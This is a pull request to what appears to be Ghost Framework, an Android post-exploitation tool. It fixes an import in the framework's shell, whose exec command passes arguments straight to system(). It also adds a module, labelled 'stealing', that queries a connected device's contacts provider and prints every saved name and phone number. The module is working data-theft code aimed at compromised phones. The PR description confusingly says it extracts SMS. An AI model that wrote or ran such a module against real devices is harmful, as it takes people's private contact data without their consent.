### PR TITLE
Fixed Error and added 'view_contacts' command

### DIFF
--- a/core/shell.py
+++ b/core/shell.py
@@ -28,6 +28,8 @@ from core.badges import badges
 from core.helper import helper
 from core.loader import loader
 
+from os import system
+
 class shell:
     def __init__(self, ghost):
         self.ghost = ghost
@@ -74,10 +76,10 @@ class shell:
                         print("Usage: exec <command>")
                     else:
                         print(self.badges.I + "exec:")
-                        os.system(arguments)
+                        system(arguments)
                         print("")
                 elif command[0] == "clear":
-                    os.system("clear")
+                    system("clear")
                 else:
                     if command[0] in target_commands.keys():
                         if target_commands[command[0]].details['needs_args']:

--- a/modules/view_contacts.py
+++ b/modules/view_contacts.py
@@ -1,0 +1,49 @@
+#!/usr/bin/env python3
+
+#
+# MIT License
+#
+# Copyright (c) 2020 EntySec
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+#
+
+from core.badges import badges
+
+class GhostModule:
+    def __init__(self, ghost):
+        self.ghost = ghost
+        self.badges = badges()
+
+        self.details = {
+            'name': "view_contacts",
+            'authors': ['jaxparrow07'],
+            'description': "Show Contcacts Saved on Device.",
+            'usage': "view_contacts",
+            'type': "stealing",
+            'args': 0,
+            'needs_args': False,
+            'needs_root': False,
+            'comments': ""
+        }
+
+    def run(self):
+        print(self.badges.G + "Getting Contcacts information...")
+        output = self.ghost.send_command("shell", "content query --uri content://contacts/phones/  --projection display_name:number")
+        print(output)


### PR DESCRIPTION
`view_contacts` command will extract the sms from the device and show it in the ghost framework. This will extract all contacts from the device which includes online contacts. And imported system only from os in the shell since It shows 'os not defined' when running `clear` or `exec`. 